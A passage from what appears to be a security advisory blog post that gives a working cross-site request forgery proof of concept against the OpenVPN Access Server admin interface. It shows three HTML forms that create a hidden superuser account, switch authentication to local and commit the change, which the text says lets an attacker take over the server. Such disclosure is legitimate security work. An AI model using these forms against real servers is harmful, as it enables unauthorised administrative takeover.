  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;prop&amp;#95;superuser" value="true" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;pvt&amp;#95;password&amp;#95;digest" value="qweasd" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;dynstatic" value="true" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;conn&amp;#95;ip" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;s2c&amp;#95;route&amp;#95;type" value="nat" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;s2c&amp;#95;routes" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;gwyesno" value="no" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;c2s&amp;#95;routes" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;dmzyesno" value="no" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;dmz&amp;#95;ip" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="button" value="Save&amp;#32;Settings" /&gt;
&lt;/form&gt;</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-2">2</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-4">4</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-6">6</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-8">8</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-10">10</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-12">12</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-14">14</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-16">16</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-18">18</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-19">19</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-20">20</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-21">21</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-22">22</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-23">23</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-24">24</div><div class="crayon-num" data-line="crayon-53c98e7808da5567114753-25">25</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808da5567114753-26">26</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7808da5567114753-1"><span class="crayon-o">&lt;</span><span class="crayon-e">form </span><span class="crayon-v">action</span><span class="crayon-o">=</span><span class="crayon-s">"https://192.168.1.133/admin/user_permissions"</span><span class="crayon-h"> </span><span class="crayon-v">method</span><span class="crayon-o">=</span><span class="crayon-s">"POST"</span><span class="crayon-h"> </span><span class="crayon-v">enctype</span><span class="crayon-o">=</span><span class="crayon-s">"multipart/form-data"</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-2"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"search"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-3"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;conn&amp;#95;group"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"None"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-4"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;pvt&amp;#95;password&amp;#95;digest"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-5"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;dynstatic"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"true"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-6"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;conn&amp;#95;ip"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-7"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;s2c&amp;#95;route&amp;#95;type"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"nat"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-8"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;s2c&amp;#95;routes"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-9"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;gwyesno"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"no"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-10"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;c2s&amp;#95;routes"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-11"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;dmzyesno"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"no"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-12"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;openvpn&amp;#58;dmz&amp;#95;ip"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-13"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"new&amp;#95;username"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"csrfaccount"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-14"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;conn&amp;#95;group"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"None"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-15"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;prop&amp;#95;superuser"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"true"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-16"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;pvt&amp;#95;password&amp;#95;digest"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"qweasd"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-17"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;dynstatic"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"true"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-18"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;conn&amp;#95;ip"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-19"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;s2c&amp;#95;route&amp;#95;type"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"nat"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-20"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;s2c&amp;#95;routes"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-21"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;gwyesno"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"no"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-22"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;c2s&amp;#95;routes"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-23"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;dmzyesno"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"no"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-24"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;dmz&amp;#95;ip"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"&amp;#13;"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808da5567114753-25"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"button"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"Save&amp;#32;Settings"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808da5567114753-26"><span class="crayon-o">&lt;</span><span class="crayon-o">/</span><span class="crayon-i">form</span><span class="crayon-o">&gt;</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0156 seconds] -->
<p>For this to be effective, we need to ensure that the server is configured to use &#8220;Local&#8221; authentication. This means OpenVPN controls the authentication, rather than using PAM/RADIUS/LDAP. We can do this with these two simple requests:</p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e7808db3093754557" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
&lt;form action="https://192.168.1.133/admin/authentication_general_configuration" method="POST" enctype="multipart/form-data"&gt;
  &lt;input type="hidden" name="auth&amp;#46;module&amp;#46;type" value="local" /&gt;
  &lt;input type="hidden" name="button" value="Save&amp;#32;Settings" /&gt;
&lt;/form&gt;</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7808db3093754557-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808db3093754557-2">2</div><div class="crayon-num" data-line="crayon-53c98e7808db3093754557-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808db3093754557-4">4</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7808db3093754557-1"><span class="crayon-o">&lt;</span><span class="crayon-e">form </span><span class="crayon-v">action</span><span class="crayon-o">=</span><span class="crayon-s">"https://192.168.1.133/admin/authentication_general_configuration"</span><span class="crayon-h"> </span><span class="crayon-v">method</span><span class="crayon-o">=</span><span class="crayon-s">"POST"</span><span class="crayon-h"> </span><span class="crayon-v">enctype</span><span class="crayon-o">=</span><span class="crayon-s">"multipart/form-data"</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808db3093754557-2"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"auth&amp;#46;module&amp;#46;type"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"local"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808db3093754557-3"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"button"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"Save&amp;#32;Settings"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808db3093754557-4"><span class="crayon-o">&lt;</span><span class="crayon-o">/</span><span class="crayon-i">form</span><span class="crayon-o">&gt;</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0021 seconds] -->
<p>When we have changed the authentication method, we need to commit the change:</p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e7808dba543754875" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
&lt;form action="https://192.168.1.133/admin/authentication_general_configuration" method="POST" enctype="multipart/form-data"&gt;
  &lt;input type="hidden" name="button" value="Update&amp;#32;Running&amp;#32;Server" /&gt;
  &lt;input type="hidden" name="auth&amp;#46;module&amp;#46;type" value="local" /&gt;
&lt;/form&gt;</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7808dba543754875-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808dba543754875-2">2</div><div class="crayon-num" data-line="crayon-53c98e7808dba543754875-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808dba543754875-4">4</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7808dba543754875-1"><span class="crayon-o">&lt;</span><span class="crayon-e">form </span><span class="crayon-v">action</span><span class="crayon-o">=</span><span class="crayon-s">"https://192.168.1.133/admin/authentication_general_configuration"</span><span class="crayon-h"> </span><span class="crayon-v">method</span><span class="crayon-o">=</span><span class="crayon-s">"POST"</span><span class="crayon-h"> </span><span class="crayon-v">enctype</span><span class="crayon-o">=</span><span class="crayon-s">"multipart/form-data"</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808dba543754875-2"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"button"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"Update&amp;#32;Running&amp;#32;Server"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line" id="crayon-53c98e7808dba543754875-3"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&lt;</span><span class="crayon-e">input </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"hidden"</span><span class="crayon-h"> </span><span class="crayon-v">name</span><span class="crayon-o">=</span><span class="crayon-s">"auth&amp;#46;module&amp;#46;type"</span><span class="crayon-h"> </span><span class="crayon-v">value</span><span class="crayon-o">=</span><span class="crayon-s">"local"</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808dba543754875-4"><span class="crayon-o">&lt;</span><span class="crayon-o">/</span><span class="crayon-i">form</span><span class="crayon-o">&gt;</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0021 seconds] -->
<p>If we do a CSRF attack against a target using these 3 requests(Which can be done with the method described in my post about <a title="Two-stage CSRF attacks" href="https://charlieeriksen.github.io/2012/09/29/two-stage-csrf-attacks/">multi-stage CSRF attacks</a>), we can then authenticate to the OpenVPN AS admin interface using the account details csrfaccount/qweasd. This further allows us to take over the server.</p>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a>, <a href="https://charlieeriksen.github.io/category/security/" title="View all posts in Security" rel="category tag">Security</a>			</span>
			<span class="sep"> / </span>			
						
						<span class="tag-links">
